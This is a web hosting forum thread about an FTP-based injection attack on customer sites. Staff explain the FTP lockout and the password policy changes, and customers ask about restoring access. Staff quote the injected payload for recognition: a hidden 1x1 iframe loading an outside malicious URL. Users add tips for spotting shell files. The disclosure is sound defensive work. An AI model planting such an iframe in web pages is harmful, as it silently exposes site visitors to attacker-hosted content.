Remote FTP access disabled on all servers

[eUKhost.com]

Dear Customers,

We have disabled remote FTP access on all servers. Recently all our servers were targeted by a server based in Gnax datacenter ( US based ) and index page of certain websites who had weak FTP password were injected.

We have executed mass replacement scripts which have removed those injection but we cannot open FTP port unless cpanel finds a solution on this problem. those who need FTP access should request support team to add their IP address in allowed list for FTP access for respective username.

If you still see the injected code in your files then there's no need to panic. remove it using file manager in your control panel or request our support team to do so. I will post link to a form which should be used to request FTP access.

There's a long discussion going on cpanel forum regarding this injections but there has been no solution so far. this injection has occurred due to vulnerability in pure-ftp service and nothing else could be done besides injection of iframe code.

There's a long thread running on cpanel forum :- http://forums.cpanel.net/showthread.php?t=62821&page=11

so far no solution. We will need to keep global FTP access disabled till cpanel replies with a solution.

All customers are request to choose a complicated FTP password of at least 10 characters. You can reset your password from control panel.

[eUKhost.com]

We have managed to communicate with the 14 year old boy from New Zealand whose server was used for this injection attack. We are not able to trace if he is the actual person who did it but he has given all the scripts and available ftp passwords he had on his server.

we are sending an email to customers whose passwords were on his server and our phone support team will be calling all those customers in next 2 days time.

he used ftp_exec function to initiate this injection and he managed to get list of passwords for those accounts which had weak password without any numbers or Caps in them. We have modified our password policy on the signup page and now every customer will need to choose a password with minimum 10 characters.

I will update with further information as we are trying to trap the actual culprit.

[DavidAllen]

Can i say well done on your actions and attempts to sort out this whole problem and catch the culprit. I know things have gotten a little 'terse' at times throughout this whole episode which has taken most of April to resolve, but thanks for all your help
Regards

[eUKhost.com]

we are looking to track marketing agencies behind this series of injections all over the web. hopefully they will add eUKhost to their ignore list.

[Eidolon]

Could you paste us info on the (types of) files to look out for on the domain, as the cPanel threads requires login first. That way if we spot the file we can take the necessary action. Also once we've reset our passwords to be atleast 10 characters (mixed case + numbers) will the FTP access be automatically restored or should we contact support to request access?

Whilst the lack of access is a bit of an inconveniant I totally understand why the action has been taken. Far better to go a bit without FTP than spend lots of time having to sort out a messed up website and ensuring the hackers can't get back in.

[DavidAllen]

Do the password changes - then request the ftp access. Once you've got that you can use ftp to see the date/time when files/directories have changed - check those files changed recently (April).
I think EUK have cleaned up most of it for you - but look especially at files called index.*

[dmwizzard]

In order to access re-appied you will need to have a static IP address from your ISP. Anyone with a Dynamic IP address will not be able to get updated!

I've spoken to Support and access to FTP is being worked on by the Admin staff. If all goes well, access will be restored asap And we will be notified via this forum... So get subscribed

Now I know why i hate Kids... LOL

[eUKhost.com]

Code:

 < iframe src='http://huyamilka.com/strong/092/' width=1  height=1>< /iframe >

this was injected in accounts with weak passwords. I was surprised to see all their data as they had FTP passwords for main accounts which could have been used to access cpanel as well.

We have managed to find the exact thing which was used as the datacenter hosting huyamilka.com gave all their data to us to verify. also the kid whose server was used gave all data to us and as per that we have disabled ftp_exec function on our server. so now we have all types of exec functions disabled on server which will make some inconvenience to our customers but this is the high time to switch to secure applications and secure code. anything done in php wont work for your website. it has to exclude all exec functions to work on our servers.

We have reserved 1 server for exec functions which will be used to migrate accounts of customers who will insist for exec functions.

global FTP access will be restored on all servers once all passwords are changed for the accounts which got targeted. we have abnormal load on helpdesk for ftp and register_globals but things will get back to normal in next 2 days.

[easylie]

I was supposed to have two websites go live this weekend, any idea how can i upload them without ftp?
I have already changed my password, but I still can not upload anything. To be honest, I've only had a reseller package a few weeks now, and I'm beginning to regret choosing eukhost as I've had nothing but trouble since moving my websites here.

[Ryan]

Hello easylie,

We are waiting for all customers to change their passwords before restoring the access to prevent any such problem from re-occurring. As you wish to upload two new websites this weekend, you can contact our support team to add your IP address in the allowed list for FTP access for respective username.

[Hunter]

My password is 21 characters long. I changed it a few weeks ago the second I saw my Index page had altered.

[eUKhost.com]

Quote:

Originally Posted by Hunter

My password is 21 characters long. I changed it a few weeks ago the second I saw my Index page had altered.

thats good. I hope you don't forget it

[Hunter]

I made it 23 now And no, I can't forget it

[swexpert]

Users should also check their .htaccess file. If it matches the date/time with the date time of attack provided by EUKhost, the contents should be verified.

Additionally, check for existence of special "shell" files, specifically php files that may use the "exec" function to steal weak passwords. A russian group has a very very powerful and commonly available tool that does this job automatically.

IF USERS SEE "99" IN ANY UNSUSPECTED FILENAME, E.G., 99.php, THEY SOULD IMMEDIATELY INFORM SUPPORT.

Yeah I shouted because it was needed, but no need to panic. One just needs to be careful and cautious at times of attacks, be it in cyber or real world.

Regds
IJ

[swexpert]

Easylie,
You can upload using CPANEL's file manager.

BTW, your ID seems very interesting!

Regds
IJ

[easyliferay]

Yeh, my user name is 'easylferay' how 'easylie' came up is a mystery to me. But judging y my experience with eukhosts these last few week, it doesn't suprise me.

I have tried cpanel file manager, and nothing is happening, says it can not upload. this has really started to piss me off now. I purchased a hosting package a few weeks back, and it's been an absolute nightmare here. I can't upoad websites, supprt tickets are useless, never get a response and as for the live chat, the least said the better.

This is my first experience with hosting. I have over 20 websites online with various hosting companies, and for some reason I thought if I had them all under the control of one hosting service, then my life would be easier.

Anyway, I'll give it a few more dys and if things don't improve, I'll find a more reliable hosting company and cut my losses.

Nothing to be done for now, I'm off on a trip till tomorrow, perhaps I'll get some time tomorrow to try and get things sorted

[eUKhost.com]

We just needed to add your IP address to allowed list of IPs. This would allow you to connect to any of your resold accounts using FTP service.

If you had included your IP in any of your tickets in the beginning then the problem would have got solved. anyways, I've done this for you by allowing your access IP on this forum so please check if you have still not stepped out for vacation.

[CftxP]

Why don't I ever understand this stuff? But seriously, I know that this is a dumb question but why do you need an IP adress to connect to an account using the FTP service?

[flesso]

Because an IP address is like an address on a house. Each networked device has it's own IP so it can access the internet, without an IP address you can't access the net & can't recieve any data, just like if your house didn't have an address, you wouldn't be able to recieve any post.

[dmwizzard]

I'm with AOL and have a Dynamic IP address which changes from time to time. So there's no point in me giving my IP address to eUK host for them to add to the allowed list...

Does this mean I'll never get FTP access back???